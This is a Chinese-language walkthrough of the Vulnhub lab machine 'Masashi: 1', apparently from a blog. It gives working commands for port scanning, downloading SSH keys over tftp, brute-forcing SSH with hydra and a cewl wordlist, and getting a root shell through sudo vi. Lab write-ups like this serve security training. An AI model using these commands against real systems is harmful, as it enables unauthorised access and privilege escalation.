Vulnhub: Masashi: 1靶机

kali:192.168.111.111

靶机:192.168.111.236

信息收集

端口扫描

复制代码
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.236

查看80端口的robots.txt提示三个文件

snmpwalk.txt内容,tftp服务在1337端口

sshfolder.txt内容,提示用户名sv5

tftp连接目标下载id_rsaid_rsa.pub

复制代码
tftp 192.168.111.236 1337
get id_rsa
get id_rsa.pub

利用cewl爬取目标网站生成字典,再利用生成的字典爆破ssh

复制代码
cewl http://192.168.111.236 -w pass.txt
hydra -l sv5 -P ./pass.txt 192.168.111.236 -s 22 ssh -t 64

提权

sv5用户sudo权限

提升为root

复制代码
sudo -u root /usr/bin/vi /tmp/a.txt
:!/bin/bash									#进入末行模式输入

flag

相关推荐
自由鬼7 分钟前
开源漏洞扫描器:OpenVAS
运维·服务器·安全·网络安全·开源·漏洞管理
Python_金钱豹20 分钟前
Text2SQL零代码实战!RAGFlow 实现自然语言转 SQL 的终极指南
前端·数据库·sql·安全·ui·langchain·机器人
TazmiDev23 分钟前
2025 XYCTF ezsql 详细教程wp
web安全·网络安全·ctf·sql注入·布尔盲注
广东航连科技1 小时前
银行网点款箱交接权限认证开锁与密钥时效双重监控
物联网·安全·银行·精细化管理·锁控·智能锁·款箱
迷路的小绅士1 小时前
网络安全概述:定义、重要性与发展历程
网络·安全·web安全
胡八一4 小时前
如何在 Dialog 中安全初始化 ECharts 并自动监听容器大小变化
前端·安全·echarts
virelin_Y.lin6 小时前
系统与网络安全------弹性交换网络(2)
网络·安全·web安全·链路聚合·lacp·eth-trunk
大小曲奇(´ε` )8 小时前
使用安全继电器的急停电路设计
安全
go_to_hacker8 小时前
安恒web安全春招实战
安全·web安全·网络安全·渗透测试
网络安全工程师老王12 小时前
Java Agent 注入 WebSocket 篇
websocket·网络安全·信息安全·渗透测试